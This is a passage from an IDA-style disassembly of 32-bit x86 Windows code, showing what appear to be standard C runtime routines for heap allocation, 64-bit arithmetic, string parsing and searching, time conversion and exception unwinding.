push [esp+4+arg_4]
push [esp+8+arg_0]
call sub_414B97
add esp, 0Ch
retn
sub_414BF3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_414C06 proc near ; CODE XREF: sub_414C81+B�p
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
push 0Ch
push offset stru_428D58
call __SEH_prolog
mov esi, [ebp+arg_0]
cmp dword_47C9A0, 3
jnz short loc_414C4C
cmp esi, dword_47C98C
ja short loc_414C4C
push 4
call sub_4180B5
pop ecx
and [ebp+ms_exc.disabled], 0
push esi
call sub_41890D
pop ecx
mov [ebp+var_1C], eax
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_414C78
mov eax, [ebp+var_1C]
test eax, eax
jnz short loc_414C6F
loc_414C4C: ; CODE XREF: sub_414C06+16�j
; sub_414C06+1E�j
test esi, esi
jnz short loc_414C51
inc esi
loc_414C51: ; CODE XREF: sub_414C06+48�j
cmp dword_47C9A0, 1
jz short loc_414C60
add esi, 0Fh
and esi, 0FFFFFFF0h
loc_414C60: ; CODE XREF: sub_414C06+52�j
push esi
push 0
push dword_47C99C
call ds:dword_42005C ; RtlAllocateHeap
loc_414C6F: ; CODE XREF: sub_414C06+44�j
call __SEH_epilog
retn
sub_414C06 endp
; =============== S U B R O U T I N E =======================================
sub_414C75 proc near ; DATA XREF: .rdata:stru_428D58�o
mov esi, [ebp+8]
sub_414C75 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_414C78 proc near ; CODE XREF: sub_414C06+3A�p
push 4
call sub_418021
pop ecx
retn
sub_414C78 endp
; =============== S U B R O U T I N E =======================================
sub_414C81 proc near ; CODE XREF: sub_414CAD+A�p
; sub_41542E+6�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
cmp [esp+arg_0], 0FFFFFFE0h
ja short loc_414CAA
loc_414C88: ; CODE XREF: sub_414C81+27�j
push [esp+arg_0]
call sub_414C06
test eax, eax
pop ecx
jnz short locret_414CAC
cmp [esp+arg_4], eax
jz short locret_414CAC
push [esp+arg_0]
call sub_4192AD
test eax, eax
pop ecx
jnz short loc_414C88
loc_414CAA: ; CODE XREF: sub_414C81+5�j
xor eax, eax
locret_414CAC: ; CODE XREF: sub_414C81+13�j
; sub_414C81+19�j
retn
sub_414C81 endp
; =============== S U B R O U T I N E =======================================
sub_414CAD proc near ; CODE XREF: sub_402DDF+1E�p
; sub_407C37+5E�p ...
arg_0 = dword ptr 4
push dword_47C37C
push [esp+4+arg_0]
call sub_414C81
pop ecx
pop ecx
retn
sub_414CAD endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_414CC0 proc near ; CODE XREF: sub_4021B5+18D�p
; sub_4111E2+114�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
mov eax, [esp+arg_4]
mov ecx, [esp+arg_C]
or ecx, eax
mov ecx, [esp+arg_8]
jnz short loc_414CD9
mov eax, [esp+arg_0]
mul ecx
retn 10h
; ---------------------------------------------------------------------------
loc_414CD9: ; CODE XREF: sub_414CC0+E�j
push ebx
mul ecx
mov ebx, eax
mov eax, [esp+4+arg_0]
mul [esp+4+arg_C]
add ebx, eax
mov eax, [esp+4+arg_0]
mul ecx
add edx, ebx
pop ebx
retn 10h
sub_414CC0 endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_1. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_414CF5 proc near ; CODE XREF: sub_414D2D�p
mov eax, offset sub_419999
mov off_42DE98, eax
mov off_42DE9C, offset sub_419613
mov off_42DEA0, offset sub_419678
mov off_42DEA4, offset sub_4195D7
mov off_42DEA8, offset sub_41965E
mov off_42DEAC, eax
retn
sub_414CF5 endp
; =============== S U B R O U T I N E =======================================
sub_414D2D proc near ; CODE XREF: sub_415D8B+9�p
; DATA XREF: .data:off_42D7A8�o
call sub_414CF5
call sub_419A3C
mov dword_47C1BC, eax
call sub_4199EA
fnclex
retn
sub_414D2D endp
; =============== S U B R O U T I N E =======================================
sub_414D44 proc near ; CODE XREF: sub_402AE7+8�p
; sub_413E26+FE�p
arg_0 = dword ptr 4
arg_4 = byte ptr 8
push [esp+arg_0]
call ds:dword_4200A0 ; GetFileAttributesA
cmp eax, 0FFFFFFFFh
jnz short loc_414D64
call ds:dword_420008 ; RtlGetLastWin32Error
push eax
call sub_419442
pop ecx
loc_414D60: ; CODE XREF: sub_414D44+41�j
or eax, 0FFFFFFFFh
retn
; ---------------------------------------------------------------------------
loc_414D64: ; CODE XREF: sub_414D44+D�j
test al, 1
jz short loc_414D87
test [esp+arg_4], 2
jz short loc_414D87
call sub_419430
mov dword ptr [eax], 0Dh
call sub_419439
mov dword ptr [eax], 5
jmp short loc_414D60
; ---------------------------------------------------------------------------
loc_414D87: ; CODE XREF: sub_414D44+22�j
; sub_414D44+29�j
xor eax, eax
retn
sub_414D44 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_414D90 proc near ; CODE XREF: sub_402B01+2A�p
; sub_416492+60D�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push esi
mov eax, [esp+4+arg_C]
or eax, eax
jnz short loc_414DC1
mov ecx, [esp+4+arg_8]
mov eax, [esp+4+arg_4]
xor edx, edx
div ecx
mov ebx, eax
mov eax, [esp+4+arg_0]
div ecx
mov esi, eax
mov eax, ebx
mul [esp+4+arg_8]
mov ecx, eax
mov eax, esi
mul [esp+4+arg_8]
add edx, ecx
jmp short loc_414E08
; ---------------------------------------------------------------------------
loc_414DC1: ; CODE XREF: sub_414D90+7�j
mov ecx, eax
mov ebx, [esp+4+arg_8]
mov edx, [esp+4+arg_4]
mov eax, [esp+4+arg_0]
loc_414DCF: ; CODE XREF: sub_414D90+49�j
shr ecx, 1
rcr ebx, 1
shr edx, 1
rcr eax, 1
or ecx, ecx
jnz short loc_414DCF
div ebx
mov esi, eax
mul [esp+4+arg_C]
mov ecx, eax
mov eax, [esp+4+arg_8]
mul esi
add edx, ecx
jb short loc_414DFD
cmp edx, [esp+4+arg_4]
ja short loc_414DFD
jb short loc_414E06
cmp eax, [esp+4+arg_0]
jbe short loc_414E06
loc_414DFD: ; CODE XREF: sub_414D90+5D�j
; sub_414D90+63�j
dec esi
sub eax, [esp+4+arg_8]
sbb edx, [esp+4+arg_C]
loc_414E06: ; CODE XREF: sub_414D90+65�j
; sub_414D90+6B�j
xor ebx, ebx
loc_414E08: ; CODE XREF: sub_414D90+2F�j
sub eax, [esp+4+arg_0]
sbb edx, [esp+4+arg_4]
neg edx
neg eax
sbb edx, 0
mov ecx, edx
mov edx, ebx
mov ebx, ecx
mov ecx, eax
mov eax, esi
pop esi
retn 10h
sub_414D90 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_414E30 proc near ; CODE XREF: sub_402C05+5F�p
; sub_402C05+90�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push edi
push esi
push ebx
xor edi, edi
mov eax, [esp+0Ch+arg_4]
or eax, eax
jge short loc_414E51
inc edi
mov edx, [esp+0Ch+arg_0]
neg eax
neg edx
sbb eax, 0
mov [esp+0Ch+arg_4], eax
mov [esp+0Ch+arg_0], edx
loc_414E51: ; CODE XREF: sub_414E30+B�j
mov eax, [esp+0Ch+arg_C]
or eax, eax
jge short loc_414E6D
inc edi
mov edx, [esp+0Ch+arg_8]
neg eax
neg edx
sbb eax, 0
mov [esp+0Ch+arg_C], eax
mov [esp+0Ch+arg_8], edx
loc_414E6D: ; CODE XREF: sub_414E30+27�j
or eax, eax
jnz short loc_414E89
mov ecx, [esp+0Ch+arg_8]
mov eax, [esp+0Ch+arg_4]
xor edx, edx
div ecx
mov ebx, eax
mov eax, [esp+0Ch+arg_0]
div ecx
mov edx, ebx
jmp short loc_414ECA
; ---------------------------------------------------------------------------
loc_414E89: ; CODE XREF: sub_414E30+3F�j
mov ebx, eax
mov ecx, [esp+0Ch+arg_8]
mov edx, [esp+0Ch+arg_4]
mov eax, [esp+0Ch+arg_0]
loc_414E97: ; CODE XREF: sub_414E30+71�j
shr ebx, 1
rcr ecx, 1
shr edx, 1
rcr eax, 1
or ebx, ebx
jnz short loc_414E97
div ecx
mov esi, eax
mul [esp+0Ch+arg_C]
mov ecx, eax
mov eax, [esp+0Ch+arg_8]
mul esi
add edx, ecx
jb short loc_414EC5
cmp edx, [esp+0Ch+arg_4]
ja short loc_414EC5
jb short loc_414EC6
cmp eax, [esp+0Ch+arg_0]
jbe short loc_414EC6
loc_414EC5: ; CODE XREF: sub_414E30+85�j
; sub_414E30+8B�j
dec esi
loc_414EC6: ; CODE XREF: sub_414E30+8D�j
; sub_414E30+93�j
xor edx, edx
mov eax, esi
loc_414ECA: ; CODE XREF: sub_414E30+57�j
dec edi
jnz short loc_414ED4
neg edx
neg eax
sbb edx, 0
loc_414ED4: ; CODE XREF: sub_414E30+9B�j
pop ebx
pop esi
pop edi
retn 10h
sub_414E30 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_414EE0 proc near ; CODE XREF: sub_4031AF+C6�p
; sub_4031AF+133�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov ecx, [esp+arg_4]
push edi
push ebx
push esi
mov dl, [ecx]
mov edi, [esp+0Ch+arg_0]
test dl, dl
jz short loc_414F60
mov dh, [ecx+1]
test dh, dh
jz short loc_414F4D
loc_414EF8: ; CODE XREF: sub_414EE0+58�j
; sub_414EE0+6B�j
mov esi, edi
mov ecx, [esp+0Ch+arg_4]
mov al, [edi]
add esi, 1
cmp al, dl
jz short loc_414F1E
test al, al
jz short loc_414F18
loc_414F0B: ; CODE XREF: sub_414EE0+36�j
mov al, [esi]
add esi, 1
loc_414F10: ; CODE XREF: sub_414EE0+45�j
cmp al, dl
jz short loc_414F1E
test al, al
jnz short loc_414F0B
loc_414F18: ; CODE XREF: sub_414EE0+29�j
pop esi
pop ebx
pop edi
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_414F1E: ; CODE XREF: sub_414EE0+25�j
; sub_414EE0+32�j
mov al, [esi]
add esi, 1
cmp al, dh
jnz short loc_414F10
lea edi, [esi-1]
loc_414F2A: ; CODE XREF: sub_414EE0+69�j
mov ah, [ecx+2]
test ah, ah
jz short loc_414F59
mov al, [esi]
add esi, 2
cmp al, ah
jnz short loc_414EF8
mov al, [ecx+3]
test al, al
jz short loc_414F59
mov ah, [esi-1]
add ecx, 2
cmp al, ah
jz short loc_414F2A
jmp short loc_414EF8
; ---------------------------------------------------------------------------
loc_414F4D: ; CODE XREF: sub_414EE0+16�j
xor eax, eax
pop esi
pop ebx
pop edi
mov al, dl
jmp loc_4158C6
; ---------------------------------------------------------------------------
loc_414F59: ; CODE XREF: sub_414EE0+4F�j
; sub_414EE0+5F�j
lea eax, [edi-1]
pop esi
pop ebx
pop edi
retn
; ---------------------------------------------------------------------------
loc_414F60: ; CODE XREF: sub_414EE0+F�j
mov eax, edi
pop esi
pop ebx
pop edi
retn
sub_414EE0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_414F66 proc near ; CODE XREF: sub_4031AF+BF�p
; sub_4031AF+12C�p ...
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
push 18h
push offset stru_428D68
call __SEH_prolog
xor ebx, ebx
mov [ebp+var_1C], ebx
call sub_416C45
mov esi, [eax+64h]
mov [ebp+var_20], esi
cmp esi, off_42D84C
jz short loc_414F94
call sub_417A7E
mov esi, eax
mov [ebp+var_20], esi
loc_414F94: ; CODE XREF: sub_414F66+22�j
mov eax, [esi+14h]
cmp eax, ebx
jnz short loc_414FC3
mov eax, [ebp+arg_0]
mov edx, eax
cmp [eax], bl
jz loc_415071
loc_414FA8: ; CODE XREF: sub_414F66+56�j
mov cl, [edx]
cmp cl, 61h
jl short loc_414FB9
cmp cl, 7Ah
jg short loc_414FB9
sub cl, 20h
mov [edx], cl
loc_414FB9: ; CODE XREF: sub_414F66+47�j
; sub_414F66+4C�j
inc edx
cmp [edx], bl
jnz short loc_414FA8
jmp loc_415071
; ---------------------------------------------------------------------------
loc_414FC3: ; CODE XREF: sub_414F66+33�j
push 1
push dword ptr [esi+4]
push ebx
push ebx
push 0FFFFFFFFh
push [ebp+arg_0]
push 200h
push eax
call sub_419C39
add esp, 20h
mov [ebp+var_24], eax
cmp eax, ebx
jz loc_41506E
mov [ebp+ms_exc.disabled], ebx
add eax, 3
and eax, 0FFFFFFFCh
call sub_414630
mov [ebp+ms_exc.old_esp], esp
mov edi, esp
mov [ebp+var_28], edi
or [ebp+ms_exc.disabled], 0FFFFFFFFh
jmp short loc_41501B
; ---------------------------------------------------------------------------
loc_415004: ; DATA XREF: .rdata:stru_428D68�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_415008: ; DATA XREF: .rdata:stru_428D68�o
mov esp, [ebp+ms_exc.old_esp]
call sub_419B68
xor ebx, ebx
xor edi, edi
or [ebp+ms_exc.disabled], 0FFFFFFFFh
mov esi, [ebp+var_20]
loc_41501B: ; CODE XREF: sub_414F66+9C�j
cmp edi, ebx
jnz short loc_415035
push [ebp+var_24]
call sub_414CAD
pop ecx
mov edi, eax
mov [ebp+var_1C], 1
cmp edi, ebx
jz short loc_415062
loc_415035: ; CODE XREF: sub_414F66+B7�j
push 1
push dword ptr [esi+4]
push [ebp+var_24]
push edi
push 0FFFFFFFFh
push [ebp+arg_0]
push 200h
push dword ptr [esi+14h]
call sub_419C39
add esp, 20h
test eax, eax
jz short loc_415062
push edi
push [ebp+arg_0]
call sub_419A70
pop ecx
pop ecx
loc_415062: ; CODE XREF: sub_414F66+CD�j
; sub_414F66+EF�j
cmp [ebp+var_1C], ebx
jz short loc_41506E
push edi
call sub_414844
pop ecx
loc_41506E: ; CODE XREF: sub_414F66+7C�j
; sub_414F66+FF�j
mov eax, [ebp+arg_0]
loc_415071: ; CODE XREF: sub_414F66+3C�j
; sub_414F66+58�j
lea esp, [ebp-34h]
call __SEH_epilog
retn
sub_414F66 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41507A proc near ; CODE XREF: sub_415239+E�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
call sub_416C45
mov esi, [eax+64h]
cmp esi, off_42D84C
jz short loc_415098
call sub_417A7E
mov esi, eax
loc_415098: ; CODE XREF: sub_41507A+15�j
mov ecx, [ebp+arg_0]
and [ebp+var_4], 0
mov bl, [ecx]
lea edi, [ecx+1]
loc_4150A4: ; CODE XREF: sub_41507A+55�j
cmp dword ptr [esi+28h], 1
movzx eax, bl
jle short loc_4150BE
push 8
push eax
push esi
call sub_41787B
mov ecx, [ebp+arg_0]
add esp, 0Ch
jmp short loc_4150C8
; ---------------------------------------------------------------------------
loc_4150BE: ; CODE XREF: sub_41507A+31�j
mov edx, [esi+48h]
movzx eax, byte ptr [edx+eax*2]
and eax, 8
loc_4150C8: ; CODE XREF: sub_41507A+42�j
test eax, eax
jz short loc_4150D1
mov bl, [edi]
inc edi
jmp short loc_4150A4
; ---------------------------------------------------------------------------
loc_4150D1: ; CODE XREF: sub_41507A+50�j
cmp bl, 2Dh
jnz short loc_4150DC
or [ebp+arg_C], 2
jmp short loc_4150E1
; ---------------------------------------------------------------------------
loc_4150DC: ; CODE XREF: sub_41507A+5A�j
cmp bl, 2Bh
jnz short loc_4150E4
loc_4150E1: ; CODE XREF: sub_41507A+60�j
mov bl, [edi]
inc edi
loc_4150E4: ; CODE XREF: sub_41507A+65�j
mov eax, [ebp+arg_8]
test eax, eax
jl loc_415229
cmp eax, 1
jz loc_415229
cmp eax, 24h
jg loc_415229
test eax, eax
push 10h
pop ecx
jnz short loc_41512C
cmp bl, 30h
jz short loc_415116
mov [ebp+arg_8], 0Ah
jmp short loc_415144
; ---------------------------------------------------------------------------
loc_415116: ; CODE XREF: sub_41507A+91�j
mov al, [edi]
cmp al, 78h
jz short loc_415129
cmp al, 58h
jz short loc_415129
mov [ebp+arg_8], 8
jmp short loc_415144
; ---------------------------------------------------------------------------
loc_415129: ; CODE XREF: sub_41507A+A0�j
; sub_41507A+A4�j
mov [ebp+arg_8], ecx
loc_41512C: ; CODE XREF: sub_41507A+8C�j
cmp [ebp+arg_8], ecx
jnz short loc_415144
cmp bl, 30h
jnz short loc_415144
mov al, [edi]
cmp al, 78h
jz short loc_415140
cmp al, 58h
jnz short loc_415144
loc_415140: ; CODE XREF: sub_41507A+C0�j
inc edi
mov bl, [edi]
inc edi
loc_415144: ; CODE XREF: sub_41507A+9A�j
; sub_41507A+AD�j ...
or eax, 0FFFFFFFFh
xor edx, edx
div [ebp+arg_8]
loc_41514C: ; CODE XREF: sub_41507A+134�j
mov esi, off_42DEB0
movzx ecx, bl
mov cx, [esi+ecx*2]
test cl, 4
jz short loc_415166
movsx ecx, bl
sub ecx, 30h
jmp short loc_415185
; ---------------------------------------------------------------------------
loc_415166: ; CODE XREF: sub_41507A+E2�j
test cx, 103h
jz short loc_4151B0
cmp bl, 61h
jl short loc_41517F
cmp bl, 7Ah
jg short loc_41517F
movsx ecx, bl
sub ecx, 20h
jmp short loc_415182
; ---------------------------------------------------------------------------
loc_41517F: ; CODE XREF: sub_41507A+F6�j
; sub_41507A+FB�j
movsx ecx, bl
loc_415182: ; CODE XREF: sub_41507A+103�j
add ecx, 0FFFFFFC9h
loc_415185: ; CODE XREF: sub_41507A+EA�j
cmp ecx, [ebp+arg_8]
jnb short loc_4151B0
or [ebp+arg_C], 8
cmp [ebp+var_4], eax
jb short loc_41519F
jnz short loc_415199
cmp ecx, edx
jbe short loc_41519F
loc_415199: ; CODE XREF: sub_41507A+119�j
or [ebp+arg_C], 4
jmp short loc_4151AB
; ---------------------------------------------------------------------------
loc_41519F: ; CODE XREF: sub_41507A+117�j
; sub_41507A+11D�j
mov esi, [ebp+var_4]
imul esi, [ebp+arg_8]
add esi, ecx
mov [ebp+var_4], esi
loc_4151AB: ; CODE XREF: sub_41507A+123�j
mov bl, [edi]
inc edi
jmp short loc_41514C
; ---------------------------------------------------------------------------
loc_4151B0: ; CODE XREF: sub_41507A+F1�j
; sub_41507A+10E�j
mov eax, [ebp+arg_C]
dec edi
test al, 8
jnz short loc_4151C7
cmp [ebp+arg_4], 0
jz short loc_4151C1
mov edi, [ebp+arg_0]
loc_4151C1: ; CODE XREF: sub_41507A+142�j
and [ebp+var_4], 0
jmp short loc_415212
; ---------------------------------------------------------------------------
loc_4151C7: ; CODE XREF: sub_41507A+13C�j
test al, 4
mov esi, 7FFFFFFFh
jnz short loc_4151EB
test al, 1
jnz short loc_415212
and eax, 2
jz short loc_4151E2
cmp [ebp+var_4], 80000000h
ja short loc_4151EB
loc_4151E2: ; CODE XREF: sub_41507A+15D�j
test eax, eax
jnz short loc_415212
cmp [ebp+var_4], esi
jbe short loc_415212
loc_4151EB: ; CODE XREF: sub_41507A+154�j
; sub_41507A+166�j
call sub_419430
test byte ptr [ebp+arg_C], 1
mov dword ptr [eax], 22h
jz short loc_415202
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_415212
; ---------------------------------------------------------------------------
loc_415202: ; CODE XREF: sub_41507A+180�j
mov al, byte ptr [ebp+arg_C]
and al, 2
neg al
sbb eax, eax
neg eax
add eax, esi
mov [ebp+var_4], eax
loc_415212: ; CODE XREF: sub_41507A+14B�j
; sub_41507A+158�j ...
mov eax, [ebp+arg_4]
test eax, eax
jz short loc_41521B
mov [eax], edi
loc_41521B: ; CODE XREF: sub_41507A+19D�j
test byte ptr [ebp+arg_C], 2
jz short loc_415224
neg [ebp+var_4]
loc_415224: ; CODE XREF: sub_41507A+1A5�j
mov eax, [ebp+var_4]
jmp short loc_415234
; ---------------------------------------------------------------------------
loc_415229: ; CODE XREF: sub_41507A+6F�j
; sub_41507A+78�j ...
mov eax, [ebp+arg_4]
test eax, eax
jz short loc_415232
mov [eax], ecx
loc_415232: ; CODE XREF: sub_41507A+1B4�j
xor eax, eax
loc_415234: ; CODE XREF: sub_41507A+1AD�j
pop edi
pop esi
pop ebx
leave
retn
sub_41507A endp
; =============== S U B R O U T I N E =======================================
sub_415239 proc near ; CODE XREF: sub_403BFF+440�p
; sub_4089DC+27DE�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push 1
push [esp+4+arg_8]
push [esp+8+arg_4]
push [esp+0Ch+arg_0]
call sub_41507A
add esp, 10h
retn
sub_415239 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415250 proc near ; CODE XREF: sub_403BFF+50�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
lea eax, [ebp+var_8]
push eax
call ds:dword_42015C ; GetSystemTimeAsFileTime
mov eax, [ebp+var_8]
mov ecx, [ebp+var_4]
push 0
add eax, 2AC18000h
push 989680h
adc ecx, 0FE624E21h
push ecx
push eax
call sub_415F90
mov ecx, [ebp+arg_0]
test ecx, ecx
jz short locret_415287
mov [ecx], eax
locret_415287: ; CODE XREF: sub_415250+33�j
leave
retn
sub_415250 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415289 proc near ; CODE XREF: sub_4041A6+2A�p
; sub_404C2E+FD�p ...
var_24 = byte ptr -24h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 24h
mov eax, dword_42DEB8
xor eax, [ebp+4]
push ebx
push esi
mov esi, [ebp+arg_4]
push edi
mov [ebp+var_4], eax
call sub_416C45
push 8
pop ecx
mov [ebp+arg_4], eax
xor eax, eax
lea edi, [ebp+var_24]
push 7
rep stosd
pop edi
loc_4152B5: ; CODE XREF: sub_415289+45�j
mov dl, [esi]
movzx ecx, dl
mov eax, ecx
and ecx, edi
mov bl, 1
shl bl, cl
shr eax, 3
lea eax, [ebp+eax+var_24]
or [eax], bl
inc esi
test dl, dl
jnz short loc_4152B5
mov edx, [ebp+arg_0]
test edx, edx
jnz short loc_4152E4
mov eax, [ebp+arg_4]
mov edx, [eax+18h]
jmp short loc_4152E4
; ---------------------------------------------------------------------------
loc_4152DF: ; CODE XREF: sub_415289+72�j
test al, al
jz short loc_4152FD
inc edx
loc_4152E4: ; CODE XREF: sub_415289+4C�j
; sub_415289+54�j
mov al, [edx]
movzx esi, al
xor ebx, ebx
mov ecx, esi
and ecx, edi
inc ebx
shl ebx, cl
shr esi, 3
mov cl, [ebp+esi+var_24]
test bl, cl
jnz short loc_4152DF
loc_4152FD: ; CODE XREF: sub_415289+58�j
mov ebx, edx
jmp short loc_415319
; ---------------------------------------------------------------------------
loc_415301: ; CODE XREF: sub_415289+93�j
movzx esi, byte ptr [edx]
xor eax, eax
mov ecx, esi
and ecx, edi
inc eax
shl eax, cl
shr esi, 3
mov cl, [ebp+esi+var_24]
test al, cl
jnz short loc_415320
inc edx
loc_415319: ; CODE XREF: sub_415289+76�j
cmp byte ptr [edx], 0
jnz short loc_415301
jmp short loc_415324
; ---------------------------------------------------------------------------
loc_415320: ; CODE XREF: sub_415289+8D�j
and byte ptr [edx], 0
inc edx
loc_415324: ; CODE XREF: sub_415289+95�j
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_4]
mov [eax+18h], edx
mov eax, ebx
sub eax, edx
neg eax
sbb eax, eax
xor ecx, [ebp+4]
pop edi
and eax, ebx
pop esi
pop ebx
call sub_41A026
leave
retn
sub_415289 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415344 proc near ; CODE XREF: sub_41540C+1A�p
var_4 = byte ptr -4
var_3 = byte ptr -3
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
mov ebx, [ebp+arg_4]
push esi
mov esi, [ebp+arg_0]
cmp dword ptr [esi+14h], 0
push edi
jz loc_4153F8
cmp dword ptr [esi+24h], 0
jz short loc_41536A
cmp ebx, 7Fh
jbe loc_4153F8
loc_41536A: ; CODE XREF: sub_415344+1B�j
xor edi, edi
inc edi
cmp ebx, 100h
jnb short loc_415394
cmp [esi+28h], edi
jle short loc_415387
push edi
push ebx
push esi
call sub_41787B
add esp, 0Ch
jmp short loc_415390
; ---------------------------------------------------------------------------
loc_415387: ; CODE XREF: sub_415344+34�j
mov eax, [esi+48h]
movzx eax, byte ptr [eax+ebx*2]
and eax, edi
loc_415390: ; CODE XREF: sub_415344+41�j
test eax, eax
jz short loc_415405
loc_415394: ; CODE XREF: sub_415344+2F�j
mov edx, [esi+48h]
mov eax, ebx
sar eax, 8
movzx ecx, al
test byte ptr [edx+ecx*2+1], 80h
jz short loc_4153B5
and byte ptr [ebp+arg_0+2], 0
push 2
mov byte ptr [ebp+arg_0], al
mov byte ptr [ebp+arg_0+1], bl
pop eax
jmp short loc_4153BE
; ---------------------------------------------------------------------------
loc_4153B5: ; CODE XREF: sub_415344+60�j
and byte ptr [ebp+arg_0+1], 0
mov byte ptr [ebp+arg_0], bl
mov eax, edi
loc_4153BE: ; CODE XREF: sub_415344+6F�j
push edi
push dword ptr [esi+4]
lea ecx, [ebp+var_4]
push 3
push ecx
push eax
lea eax, [ebp+arg_0]
push eax
push 100h
push dword ptr [esi+14h]
call sub_419C39
add esp, 20h
test eax, eax
jz short loc_415405
cmp eax, edi
jnz short loc_4153EB
movzx eax, [ebp+var_4]
jmp short loc_415407
; ---------------------------------------------------------------------------
loc_4153EB: ; CODE XREF: sub_415344+9F�j
movzx ecx, [ebp+var_3]
xor eax, eax
mov ah, [ebp+var_4]
or eax, ecx
jmp short loc_415407
; ---------------------------------------------------------------------------
loc_4153F8: ; CODE XREF: sub_415344+11�j
; sub_415344+20�j
cmp ebx, 41h
jl short loc_415405
cmp ebx, 5Ah
lea eax, [ebx+20h]
jle short loc_415407
loc_415405: ; CODE XREF: sub_415344+4E�j
; sub_415344+9B�j ...
mov eax, ebx
loc_415407: ; CODE XREF: sub_415344+A5�j
; sub_415344+B2�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_415344 endp
; =============== S U B R O U T I N E =======================================
sub_41540C proc near ; CODE XREF: sub_4067CC+6�p
; sub_406BB7+56�p ...
arg_0 = dword ptr 4
call sub_416C45
mov eax, [eax+64h]
cmp eax, off_42D84C
jz short loc_415421
call sub_417A7E
loc_415421: ; CODE XREF: sub_41540C+E�j
push [esp+arg_0]
push eax
call sub_415344
pop ecx
pop ecx
retn
sub_41540C endp
; =============== S U B R O U T I N E =======================================
sub_41542E proc near ; CODE XREF: sub_406FE7+27�p
; sub_407028+4D�p
arg_0 = dword ptr 4
push 1
push [esp+4+arg_0]
call sub_414C81
pop ecx
pop ecx
retn
sub_41542E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41543C proc near ; CODE XREF: sub_41A4F4+60�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
mov eax, [ebp+arg_4]
add eax, 0Ch
mov [ebp+var_4], eax
mov ebx, large fs:0
mov eax, [ebx]
mov large fs:0, eax
mov eax, [ebp+arg_0]
mov ebx, [ebp+arg_4]
mov esp, [ebx-4]
mov ebp, [ebp+var_4]
jmp eax
sub_41543C endp
; ---------------------------------------------------------------------------
pop ebx
leave
retn 8
; =============== S U B R O U T I N E =======================================
sub_41546C proc near ; CODE XREF: sub_41A16F+25�p
; sub_41A378+149�p ...
arg_4 = dword ptr 8
pop eax
pop ecx
xchg eax, [esp-8+arg_4]
jmp eax
sub_41546C endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415473 proc near ; CODE XREF: sub_41551F+5A�p
; sub_41A4F4:loc_41A517�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
push edi
mov esi, large fs:0
mov [ebp+var_4], esi
mov [ebp+var_8], offset loc_41549C
push 0
push [ebp+arg_4]
push [ebp+var_8]
push [ebp+arg_0]
call sub_41F3D6 ; RtlUnwind
loc_41549C: ; DATA XREF: sub_415473+12�o
mov eax, [ebp+arg_4]
mov eax, [eax+4]
and eax, 0FFFFFFFDh
mov ecx, [ebp+arg_4]
mov [ecx+4], eax
mov edi, large fs:0
mov ebx, [ebp+var_4]
mov [ebx], edi
mov large fs:0, ebx
pop edi
pop esi
pop ebx
leave
retn 8
sub_415473 endp
; ---------------------------------------------------------------------------
loc_4154C5: ; CODE XREF: .text:0041F9D2�j
push ebp
mov ebp, esp
sub esp, 4
push ebx
push esi
push edi
cld
mov [ebp-4], eax
xor eax, eax
push eax
push eax
push eax
push dword ptr [ebp-4]
push dword ptr [ebp+14h]
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call sub_41A7FD
add esp, 20h
mov [ebp-4], eax
pop edi
pop esi
pop ebx
mov eax, [ebp-4]
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
loc_4154FB: ; DATA XREF: sub_41569F+17�o
cld
